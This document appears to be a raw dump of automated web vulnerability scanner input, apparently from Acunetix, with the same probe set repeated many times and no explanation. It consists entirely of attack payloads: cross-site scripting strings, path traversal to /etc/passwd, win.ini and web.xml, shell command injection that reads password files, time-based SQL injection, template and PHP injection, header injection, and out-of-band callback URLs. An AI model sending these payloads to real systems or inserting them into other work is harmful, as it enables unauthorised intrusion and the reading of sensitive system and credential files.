1<div style=width:expression(prompt(964891))>

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9831785*9750691)+"

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<body onload=prompt(961389)>

1

../../../../../../../../../../etc/passwd.jpg

${100044+100123}

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987585)>

cat /etc/passwd

-1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(957483)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1)

)

1&n928164=v919755

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img/src=">" onerror=alert(934413)>

|cat /etc/passwd#

1

-1))

1

testasp.vulnweb.com

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(903798)</sCripT>

1

F631XXni'

'|'ld

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

1

1&lt

1

"|"ld

1

PMqtWfhD')

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

\xf6<img acu onmouseover=prompt(947068) //\xf6>

/etc/passwd

1

"

7yAHctnk'))

1

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(993314)>

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hitQGK02FPyiz.bxss.me/

-1

1

"

${@print(md5(acunetix_wvs_security_test))}\

1

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

[url=http://www.acunetix.com]website security[/url]

1

http://www.acunetix.tst

1

-1))

1

1_5nZIl <ScRiPt >prompt(996904)</ScRiPt>

1

comments

1

1

1'"()&%<ScRiPt >prompt(968518)</ScRiPt>

qwYDNDaP'

&dir

'"

1

1

file:///etc/passwd

comments/.

1

'"()&%<ScRiPt >prompt(949765)</ScRiPt>

1

1

'&dir&'

<!--

ZfzlnjKv')

1

1_917413

1

/\../\../\../\../\../\../\../etc/passwd

1

ygnDjY7Q'))

"&dir&"

1

1

1

1

WEB-INF/web.xml

|dir

1

1

1

acu5506\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5506

WEB-INF\web.xml

'|dir

1

1

1

"|dir

../../../../../../../../../../windows/win.ini

acux10959\xc0\xbez1\xc0\xbcz2a\x90bcxuca10959

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(942345)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(959171)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(981177)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905421></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(935897)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(968428)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(942061)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(947953))>

1

response.write(9485238*9579682)

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

'+response.write(9485238*9579682)+'

1

../../../../../../../../../../etc/passwd

1<body onload=prompt(936451)>

1

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(954261)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

"+response.write(9485238*9579682)+"

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

1

1<img src=xyz OnErRor=prompt(960982)>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(939013)>

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

${100271+100033}

1

1<ScRiPt%20>prompt(915010)</sCripT>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&lt

`cat /etc/passwd`

-1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n971436=v997402

)

-1)

|cat /etc/passwd#

\xf6<img acu onmouseover=prompt(954869) //\xf6>

1

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1<input autofocus onfocus=prompt(916444)>

-1))

'"()

1

^(#$!@#$)(()))******

testasp.vulnweb.com

1

/etc/passwd

"|"ld

<a href='http://www.acunetix.com'>website security</a>

1

1

'

1

5uBSSiZB'

1

[url=http://www.acunetix.com]website security[/url]

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1_2NYUD <ScRiPt >prompt(981354)</ScRiPt>

1

"

1

Az2jdyb7')

1

'

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

ngCxbzN3'))

${@print(md5(acunetix_wvs_security_test))}

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

http://hitUkxkr0q2NL.bxss.me/

1

"

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}\

-1

1

1

1

||cat /etc/passwd

1

1

comments

file:///etc/passwd

http://www.acunetix.tst

-1)

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

&dir

1

1

'"

1

1'"()&%<ScRiPt >prompt(980851)</ScRiPt>

-1))

/\../\../\../\../\../\../\../etc/passwd

comments/.

<!--

1

1

'&dir&'

1

'"()&%<ScRiPt >prompt(965720)</ScRiPt>

WEB-INF/web.xml

1

BFtCtlPF'

1

1

1_985433

1

"&dir&"

1

ne0CbcQg')

1

WEB-INF\web.xml

1

|dir

1

0JpBBKpM'))

1

../../../../../../../../../../windows/win.ini

1

1

'|dir

1

acu6434\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6434

"|dir

1

../../../../../../../../../../boot.ini

acux4115\xc0\xbez1\xc0\xbcz2a\x90bcxuca4115

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(919377)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(926512)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(957040)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905408></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(947999)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(998907)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992451)"></g></svg>

1

1

1<div style=width:expression(prompt(958404))>

1

1

1

response.write(9407769*9729252)

1<iframe src='data:text/html

1

1

WEB-INF/web.xml

1

1

1

1<body onload=prompt(936540)>

'+response.write(9407769*9729252)+'

1

WEB-INF\web.xml

&cat /etc/passwd&

"+response.write(9407769*9729252)+"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917723)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=xyz OnErRor=prompt(944043)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

1

1<img/src=">" onerror=alert(969135)>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<ScRiPt%20>prompt(986766)</sCripT>

${100172+99598}

1

-1

1

1&lt

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1)

1

1

\xf6<img acu onmouseover=prompt(996146) //\xf6>

)

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n974877=v965467

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

-1))

1<input autofocus onfocus=prompt(916213)>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

TUYMLkde'

<a href='http://www.acunetix.com'>website security</a>

1

'"()

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

1

1

1

[url=http://www.acunetix.com]website security[/url]

DiL1mYc2')

1

'

1

/etc/passwd

1

1

AZkIBq8A'))

1_n33km <ScRiPt >prompt(962582)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

"

1

1

1

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

http://hitPTSYv5QVrK.bxss.me/

"

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

1

||cat /etc/passwd

1

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

http://www.acunetix.tst

&dir

'"

1

bxLd2Nth'

1

comments/.

1'"()&%<ScRiPt >prompt(919171)</ScRiPt>

file:///etc/passwd

1

1

n8tHk82l')

'&dir&'

<!--

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(938324)</ScRiPt>

1

1

WEB-INF/web.xml

1

"&dir&"

kg3w8cdu'))

1

1

1_971321

1

1

|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

1

../../../../../../../../../../boot.ini

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acu2142\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2142

1

................windowswin.ini

1

1

1

acux6135\xc0\xbez1\xc0\xbcz2a\x90bcxuca6135

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(969165)</ScRiPt>

1

1

1<script>prompt(929456)</script>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(917847)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987298></ScRiPt>

1

1

response.write(9242057*9842394)

1

1

1<ScRiPt >prompt(923413)</ScRiPt>

1

&cat /etc/passwd&

'+response.write(9242057*9842394)+'

1

1

1<video><source onerror="javascript:prompt(923598)">

WEB-INF/web.xml

1

1

"+response.write(9242057*9842394)+"

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964661)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(953670))>

1

1

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<iframe src='data:text/html

`cat /etc/passwd`

${99412+99339}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

1

1

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

1<body onload=prompt(976850)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n924311=v933570

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1)

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952434)>

'|'ld

)

1

1

-1))

1

testasp.vulnweb.com

!(()&&!|*|*|

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img src=xyz OnErRor=prompt(944939)>

1

1

ZJRtGSHE'

1

^(#$!@#$)(()))******

'

1<img/src=">" onerror=alert(976578)>

'"()

/etc/passwd

1

xWPiI1sH')

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<ScRiPt%20>prompt(945288)</sCripT>

"

'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

dJjDq7CB'))

1

1

${@print(md5(acunetix_wvs_security_test))}

1

1&lt

"

1

1

-1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}\

http://hitdRXHgkvVKA.bxss.me/

||cat /etc/passwd

1

\xf6<img acu onmouseover=prompt(913005) //\xf6>

1

-1)

1

1

1

-1))

1

1<input autofocus onfocus=prompt(958622)>

1

acunetix_wvs_invalid_filename

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

jJHqLCkq'

1

'&dir&'

1

comments

<a href='http://www.acunetix.com'>website security</a>

1

http://www.acunetix.tst

1

/\../\../\../\../\../\../\../etc/passwd

WNBJQ5vp')

1

"&dir&"

'"

WEB-INF/web.xml

1'"()&%<ScRiPt >prompt(922953)</ScRiPt>

comments

[url=http://www.acunetix.com]website security[/url]

1

1

|dir

<!--

lKtJMMt3'))

1

1

comments/.

1_cMi6J <ScRiPt >prompt(912559)</ScRiPt>

'"()&%<ScRiPt >prompt(989857)</ScRiPt>

WEB-INF\web.xml

1

1

'|dir

1

1

1

1

1_927526

1

../../../../../../../../../../windows/win.ini

1

1

"|dir

../../../../../../../../../../boot.ini

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acu3930\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3930

1

................windowswin.ini

acux4668\xc0\xbez1\xc0\xbcz2a\x90bcxuca4668

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(933039)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(975719)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(926207)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?971639></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<ScRiPt >prompt(987271)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(928652)">

1

WEB-INF/web.xml

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(935881)"></g></svg>

WEB-INF\web.xml

response.write(9008429*9026701)

1

1<div style=width:expression(prompt(989385))>

1

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

'+response.write(9008429*9026701)+'

1<iframe src='data:text/html

1

../../../../../../../../../../etc/passwd

1

"+response.write(9008429*9026701)+"

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(903284)>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916345)>

${99430+100414}

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(983166)>

1

1

1

1

1<img/src=">" onerror=alert(944560)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

1

1

1

1

1<ScRiPt%20>prompt(963685)</sCripT>

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1&n936828=v922027

1

1&lt

1

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

|cat /etc/passwd#

1

1

-1)

\xf6<img acu onmouseover=prompt(984986) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

'

1<input autofocus onfocus=prompt(994621)>

-1))

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

"|"ld

"

testasp.vulnweb.com

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

30Y9MSJM'

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

T0i7Qa4w')

${@print(md5(acunetix_wvs_security_test))}\

1

1

"

acunetix_wvs_invalid_filename

1

1

1_OT3eY <ScRiPt >prompt(938268)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

C685yifl'))

1

http://hitTxpXQs4vPi.bxss.me/

comments

||cat /etc/passwd

1

1

-1

1

1

1

comments

1

&dir

1

-1)

file:///etc/passwd

1

comments/.

1

1

1

-1))

'&dir&'

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

zXUtDlbQ'

"&dir&"

'"

1

WEB-INF/web.xml

1

1

1

|dir

1'"()&%<ScRiPt >prompt(977077)</ScRiPt>

1

YB7NRWcB')

<!--

1

WEB-INF\web.xml

1

1

54aNATvn'))

'"()&%<ScRiPt >prompt(944242)</ScRiPt>

1

'|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1_955027

"|dir

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

acu7168\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7168

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

acux2846\xc0\xbez1\xc0\xbcz2a\x90bcxuca2846

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(980649)</ScRiPt>

1

1

1

1

1<script>prompt(949150)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(956580)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984819></ScRiPt>

1

1

1<ScRiPt >prompt(982741)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(985119)">

1

WEB-INF/web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950918)"></g></svg>

response.write(9919364*9686071)

1<div style=width:expression(prompt(954746))>

WEB-INF\web.xml

1

1<iframe src='data:text/html

'+response.write(9919364*9686071)+'

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9919364*9686071)+"

../../../../../../../../../../etc/passwd

1<body onload=prompt(924602)>

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936703)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(906271)>

cat /etc/passwd

1

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(983566)>

${99876+100228}

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<ScRiPt%20>prompt(993564)</sCripT>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

-1

1

1

1

1&lt

1&n966585=v955165

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

"|"ld

-1)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1some_inexistent_file_with_long_name%00.jpg

1

1

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(941122) //\xf6>

/etc/passwd

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

^(#$!@#$)(()))******

oh7ESRhm'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

testasp.vulnweb.com

1

1

1

'

'

1<input autofocus onfocus=prompt(985249)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

sAN7Cf6x')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

<a href='http://www.acunetix.com'>website security</a>

1

"

1

1

SJ5V43Xd'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

||cat /etc/passwd

1

-1

file:///etc/passwd

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

/\../\../\../\../\../\../\../etc/passwd

-1)

1_pFJx5 <ScRiPt >prompt(903542)</ScRiPt>

1

http://hittP3pbmER8h.bxss.me/

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

acunetix_wvs_invalid_filename

-1))

'&dir&'

1

1

1

1

WEB-INF/web.xml

1

1

comments

pPnJtmTn'

http://www.acunetix.tst

1

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(971107)</ScRiPt>

'"

1

comments

1

1

1

ogDuqlRo')

"&dir&"

../../../../../../../../../../windows/win.ini

1

comments/.

<!--

'"()&%<ScRiPt >prompt(984667)</ScRiPt>

1

../../../../../../../../../../boot.ini

nc80yorD'))

|dir

1

1_999047

1

1

1

'|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"|dir

1

1

acu10981\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10981

1

................windowswin.ini

1

1

acux3650\xc0\xbez1\xc0\xbcz2a\x90bcxuca3650

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(915782)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<script>prompt(967897)</script>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(926764)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942184></ScRiPt>

1

1<ScRiPt >prompt(924612)</ScRiPt>

1

1

WEB-INF/web.xml

1

1

